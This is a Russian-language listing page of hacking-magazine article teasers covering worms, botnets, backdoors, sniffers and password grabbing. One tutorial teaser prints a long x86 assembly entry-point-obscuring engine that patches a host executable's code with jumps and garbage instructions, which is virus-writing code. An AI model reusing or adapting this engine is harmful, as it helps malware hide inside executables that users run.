Временная скидка 60% на годовую подписку!
Главная Статьи (страница 219)

Статьи

Уязвимости в рейтинге Rax.ru

В данной статье я хочу рассказать о найденной уязвимости в рейтинговой системе RAX.ru. Данная статья предназначена для админов RAX.ru ;-), для админов других систем и вообще для всех людей интересующихся сетевой безопасностью

Соседи вешайтесь, подонки

Война с законопослушными соседями всегда жестока. До последней капли пива, не на жизнь, а на смерть. Вопроса, стОит или нет, даже не стоИт. Кто из нас не мечтал отомстить зарвавшимся ублюдкам? Вот-вот…. Но множество делает это неправильно, выставляя себя идиотом с недоразвитой фантазией

Mail.Ru.Worm №2

Чтобы найти дорогу, необходима самая малость.  Некоторые не видят выход, а некоторые даже не хотят его видеть...   Данный материал - продолжение темы о написании червей для web-интерфейсов на примере Mail.Ru. Поскольку тема еще не была описана на просторах РУ.НЕТа, я считаю, что чтения статьи должно будет достаточно интересно для вас..

Windows XP FAQ

Windows XP FAQ - ответы на самые разнообразные вопросы, касающиеся настройки, оптимизации, разрешения проблем и восстановления операционной системы.

BotNet: организация, возможности, вторжение

Продолжая цикл статей про eggdrop и TCL, хотелось бы упомянуть про botnet. Что такое botnet? Ни для кого не секрет, что на эггдропе можно прописывать не только юзеров, но и других ботов, которые будут (или не будут) линковаться к главному и передавать ему файл с юзер-записями

Печатаем запчасти для человека

Владимир Миронов, российский ученый, работающий сейчас в Медицинском университете штата Южная Королина США, разработал технологию изготовление запасных частей для человека типографским способом. Оказывается, трехмерные структуры из живой ткани можно печатать на модифицированных настольных принтерах, заправляя их вместо тонера клеточным раствором. 

WebSnurf 0.0.4

Интересный сниффер, который следит за удаленным пользователем (в локалке без свичей) и показывает вам что и как он делает в Инете. Есть исходники.

Соединяйся напрямую

Ты, наверное, не раз видел сообщения ослика: Поиск узла, Узел найден и т. д. Так вот, это браузер узнает IP-шник, к которому надо подрубиться, но ты-то знаешь какой IP тебе нужен (надеюсь =)). Стандартными средствами винды можно сделать так, что осел сразу будет коннектиться к нужному адресу, не тратя твое драгоценное время в Инете

Следи за процессами

Иногда бывает нужно запретить запуск некоторых прог на компе - будь то комп в универе, дабы студенты учились программированию, а не устраивали чемпионаты по Квейку, или в компьютерном клубе, где крайне нежелательны проги для подбора паролей, сканеры уязвимостей, нюкеры и прочее

Политэкономия в каpтинках

Hа вечеринке ты видишь симпатичного парня. Ты подходишь к нему и говоришь: "Со мной классно в постели". - Это прямой маркетинг Ты пришла на вечеринку с друзьями и видишь симпатичного парня. Один из твоих друзей подходит к нему и говорит: "С ней классно в постели"

IcqSnif 1.2

Программа предназначена для перехвата сообщений ICQ, IRC и email-писем в локальной сети. Вы сможете наблюдать все сообщения, ходящие в вашей сети, в то же самое время, что и настоящие пользователи. Все перехваченные сообщения сохраняются в журналы для последующего анализа и обработки

Кусочек мозга в микросхеме

Биотехнологи научились сохранять работоспособность срезов тканей мозга в течении нескольких недель. Тем самым они предоставили возможность изучать влияние химических препаратов на всю нервную сеть, а не только на клетки.  «Мы, с позволения сказать, присоединяем кусочек мозга прямо к микросхеме», - рассказывает Миро Пастрнак, директор перспективных объектов калифорнийской компании Tensor Biosciences в городе Ирвин, США

Mail.Ru.Worm №1

"Мне не нужен флюгер, чтобы знать куда дует ветер.  Поспеши, ведь мы, на самом деле, уже опаздываем..."   Тема, данной статьи - изучение работы червей, использующих для перемещения уязвимости web-интерфейсов в почтовых сервисах

Невидимый бэкдор через eggdrop

Привет хакер, за спиной которого сотни порутанных систем. Скажи мне по секрету, сколько времени держится бэкдор на порутанном тобой хостинге? День? Неделю? Две недели??! Да тебе просто повезло, чувак, потому как админы там не дремлют, а следят за своими процессами ;)

Сетевые возможности QNX №2

Transparent distributed processing (прозрачная распределенная обработка). По прочтении моей предыдущей статьи ты (надеюсь) получил некоторое представление об основных принципах функционирования КНХ-сети. В числе прочих упоминалось понятие блокировки, которому я не счел нужным дать определение, поскольку посчитал это избыточной информацией

На халяву и шаровары — клеши

Вот что, парень, учить тебя уму-разуму я не стану. Потому что, если ты по природе своей не халявщик, то никакая наука тебе впрок не пойдет. Ну а если тебе тепло очага и щей, дармовых приятно до одурения, тогда подсаживайся, слушай

Infosec 2003

С 16го по 20е июня 2003 года на сервере irc.uninet.edu проходил второй конгресс, посвященный информационной безопасности «II Information Security Congress at UniNet».

Как бороться с поисковиками

Любой более-менее знакомый с CGI-программированием чел может запросто флудить роботов-поисковиков. Для этого обычно советуют проверять на USER_AGENT и т. п. А ведь у одного только Яндекса имен роботов несколько... Да и ручная проверка тоже присутствует иногда

Вий-9х

Вот уже третью ночь семинарист Хома Брут читал молитвы в старой церкви над гробом усопшей дочери пана, очертив на полу круг мелом. Первые две ночи ведьма вставала из гроба и ходила рядом, творя черные заклинания, но не в силах переступить черту

Сетевые возможности QNX №1

Используемый в QNX4 компактный, но при этом полнофункциональный сетевой протокол FLEET обеспечивает QNX-сети высокую производительность и надежность, а используемый в этой передовой технологии механизм передачи сообщений позволяет представить локальную сеть в виде единого набора ресурсов

HTML Source Code Explorer Bar 2.0

Очень удобная программа, которая покажет исходник любой формы на страничке в виде удобной структуры. Более того, программа в реальном времени позволяет изменять значения любых полей перед отправкой, даже скрытых(hidden) полей

Паразитные расчеты: тебя уже используют

Сначала появились хакеры, они лично проникали в компьютеры жертв, чтобы выкрасть личную информацию либо порушить систему. Затем настал черед вирей и троянов, миниатюрных программ, способных так же выкрасть или порушить машину пользователя. 

Virus Cleaner

Небольшая утилитка для лечения компьютера от наиболее распространенных интернет-червей, на сегодняшней день программа способна очистить компьютер от следующих вирусов: Badtrans, BugBear, Nimda, Opas(aka Opasoft, Opaserv), Sircam, Sobig и Yaha(aka Lentin).

Яичница

Истеpические пpедпосылки Еще с незапамятных вpемен яйцо и пpодyкты из яйца слyжили важным пpодyктом, в том числе и питания. Дpевние pимляне (когда они еще не осознавали свою дpевность) любили скyшать яишенкy-дpyгyю, пpежде чем отпpавляться наблюдать за гонениями на пеpвых хpистиан, котоpые гонялись львами без всякого на то почтения к чyжой pелигии

Добыватель SMB паролей: теория

Вступление Мне не хотелось писать о том что знающий уже знает, а незнающий не поймет. Поэтому, прошу, не судить меня строго, статья рассчитана на начинающих и служит высшей цели - продолжению :) Итак, начнем... Что такое MAC адрес? Для передачи данных по сети используются пакеты

Теория стеганографии

Какая еще стеганография? За последние несколько лет активность спецслужб значительно возросла. Увеличились также их права относительно методов добычи информации, теперь они имеют право на чтение твоей личной переписки

Построение простого EPO мотора №2

;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; spots:  ; Подпрограмма генерации ; пятен mov ecx,1 ; Кладём в ecx единицу ; call reset ; Подготавливаем данные call num_spots ; Генерируем случайное число ; это будет кол-во пятен tred:  call save_bytes ; Сохраняем затираемы байты call gen_spot ; Генерируем пятно inc ecx ; Увеличиваем ecx на единицу cmp ecx,[ebp+n_spots] ; Все пятна сгенерированы jne tred ; Если нет, то генерируем call save_bytes ; Сохраняем последние байты call gen_final_spot ; И генерируем последнее ; пятно ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; gen_spot:  ; Подпрограмма генерации  ; одного пятна push eax ecx ; Сохраняем eax и ecx call len_sp_jmp ; Получаем случайную длину xchg eax,ebx ; прыжка пятна call testing ; Проверяем, чтобы пятно jc quit2 ; не выходило за кодовую ; секцию push ebx xor bx,bx dec bx mov ecx,[ebp+num1] ; Генерируем первую партию call garbage ; мусора pop ebx mov al,0e9h ;  stosb ; mov eax,0 ; Генерируем jmp add eax,ebx ; add eax,ecx ; stosd ; push ebx xor bx,bx dec bx mov ecx,[ebp+num2] ; Генерируем вторую партию call garbage ; мусора pop ebx sub edi,[ebp+num2] ;  add edi,[ebp+num1] ; Корректируем edi add edi,ebx ; quit2: pop ecx eax ; Восстанавливаем ecx и eax ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; LAST SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; gen_final_spot:  ; Подпрограмма генерации ; финального пятна push eax ecx ; Сохраняем eax и ecx jc not_big ; Если длина не превышает inc [ebp+n_spots] ; размера кодовой секции, то not_big: ; Увеличим кол-во пятен mov ecx,[ebp+num1] ; Генерируем мусорные call garbage ; инструкции push edi ; Сохраняем edi sub edi,[ebp+start_code] ; Подготавливаем длину jmp'a mov ebx,edi ; для последнего пятна pop edi ; Восстанавливаем edi mov al,0e9h ; stosb ; mov eax,0 ; sub eax,5 ; Генерируем финальное sub eax,ebx ; пятно add eax,[ebp+new_eip] ; sub eax,[ebp+old_eip] ; stosd ; mov ecx,[ebp+num2] ; Генерируем вторую партию call garbage ; мусорных инструкций pop ecx eax ; Восстанавливаем ecx и eax ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; ADDRESS OF SAVING BYTES -> EDI ; ; QUANTITY OF BYTES -> EBX ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; save_bytes: ; Подпрограмма сохранения ; заменяемых байт pusha ; Сохраняем всё в стэке call length1 ; Генерируем длины мусорных ; инструкций mov ebx,[ebp+num1] ; Помещаем в ebx первую  add ebx,[ebp+num2] ; и вторую длины add ebx,5 ; Добавляем к ebx - 5 mov esi,edi ; Сохраняем в буфере с  mov edi,[ebp+pointer] ; начала смещение в памяти mov eax,esi ; на сохраняемые байты stosd ; mov ecx,ebx ; После этого сохраняем в mov eax,ecx ; буфере кол-во сохраняемых stosd ; байт rep movsb ; И в самом конце сохраняем mov [ebp+pointer],edi ; в буфере сами байты ; popa ; Вынимаем всё из стека ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; RESTORE SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; OLD ENTRY POINT -> EBX ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; restore: ; Подпрограмма  ; восстановления сохранённых ; байт cld ; Поиск вперёд lea esi,[ebp+rest_bytes] ; В esi указазатель на буфер mov edx,1 ; В edx кладём - 1 not_enough: mov edi,[ebp+old_eip] ; В edi загружаем точку add edi,[ebp+image_base] ; входа mov ebx,edi ; Сохраняем edi в ebx lodsd ; В eax старое смещение ; байт в памяти sub eax,[ebp+start_code] ; Отнимаем смещение начала ; кода и добавляем  add edi,eax ; точку входа lodsd ; Загружаем в eax кол-во  mov ecx,eax ; байт и кладём их в ecx rep movsb ; Перемещаем оригинальные ; байты на старое место inc edx ; Переходим к следующему  cmp edx,[ebp+n_spots] ; пятну jl not_enough ; если не все пятна вернули, ; то восстанавливаем дальше quit: ;  ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; LENGTH SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; length1: ; Подпрограмма генерации ; длин мусорных инструкций mov eax,20 ; call brandom32 ; Генерируем случайное число test eax,eax ; в диапазоне 1..19 jz length1 ; mov [ebp+num1],eax ; Сохраняем его в переменную rand2: mov eax,20 ; call brandom32 ; Генерируем случайное число test eax,eax ; в диапазоне 1..19 jz rand2 ; mov [ebp+num2],eax ; Сохраняем его в вторую ; переменную ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; RESET SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; reset: ; Подпрограмма инициализации ; переменных mov edi,[ebp+start_code] ; ;  push esi ; Инициализируем переменные lea esi,[ebp+rest_bytes] ; mov [ebp+pointer],esi ; pop esi ; ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOT JUMP LENGTH GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; LENGTH OF SPOT JUMP -> EAX ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; len_sp_jmp: ; Подпрограмма генерации ; длины прыжка mov eax,150 ; call brandom32 ; Генерируем случайное число cmp eax,45 ; в диапазоне 45..149 jle len_sp_jmp ; ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS NUMBER GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; num_spots: ; Подпрограмма генерации ; количества пятен pusha ; Сохраняем всё в стеке mov eax,40 ; Генерируем случайное число call brandom32 ; в диапазоне 1..40 inc eax ; И сохраняем его в mov [ebp+n_spots],eax ; переменной popa ; Вынимаем всё из стэка ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; TESTING SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; CARRY FLAG ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; testing: ; Подпрограмма проверки ; попадания в границу секции push edi eax ; Сохраняем edi eax в стэке add edi,[ebp+num1] ; Добавим к edi 1-ую длину ; мусорных инструкций add edi,[ebp+num2] ; После этого добавим 2-ую add edi,300 ; И добавим число в которое ; входит максимальный размер ; пятна + длина его прыжка mov eax,[ebp+size_for_spot] ; В eax загрузим размер  ; места для пятен и смещение add eax,[ebp+start_code] ; в памяти точки входа cmp edi,eax ; Сравним eax и edi clc ; Сбросим carry флаг jl m_space ; Если edi меньше, то все ; хорошо mov [ebp+n_spots],ecx ; Если нет, то мы уменьшаем inc [ebp+n_spots] ; количество пятен и  stc ; устанавливаем carry флаг m_space: pop eax edi ; Вынимаем eax и edi  ret ; Возврат из процедуры ;--------------------------; pointer dd 0 ; n_spots dd 0 ; ; num1 dd 0 ; num2 dd 0 ; ; Данные необходимые для PE_header dd 0 ; работы мотора old_eip dd 0 ; image_base dd 0 ; start_code dd 0 ; new_eip dd 0 ; map_address dd 0 ; size_for_spot dd 0 ; rest_bytes: db 2100 dup (?) ; ;--------------------------; В качестве параметра данному мотору передаётся адрес файла в памяти (MapViewOfFile)

Страница 219 из 299В начало...190200210217218219220221 230240250...
CyberED

Бумажный спецвыпуск

Еженедельный дайджест

Спасибо за подписку! Мы будем присылать важные новости ИБ в еженедельном дайджесте
Ошибка при подписке Случилась ошибка при создании подписки на наш дайджест. Пожалуйста, попробуйте позднее
Важные события и скидка на подписку:
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
  • доступ к платным материалам сайта
  • доступ ко всем номерам PDF
4500 р.
на год
950 р.
на месяц

«Хакер» в соцсетях

Материалы для подписчиков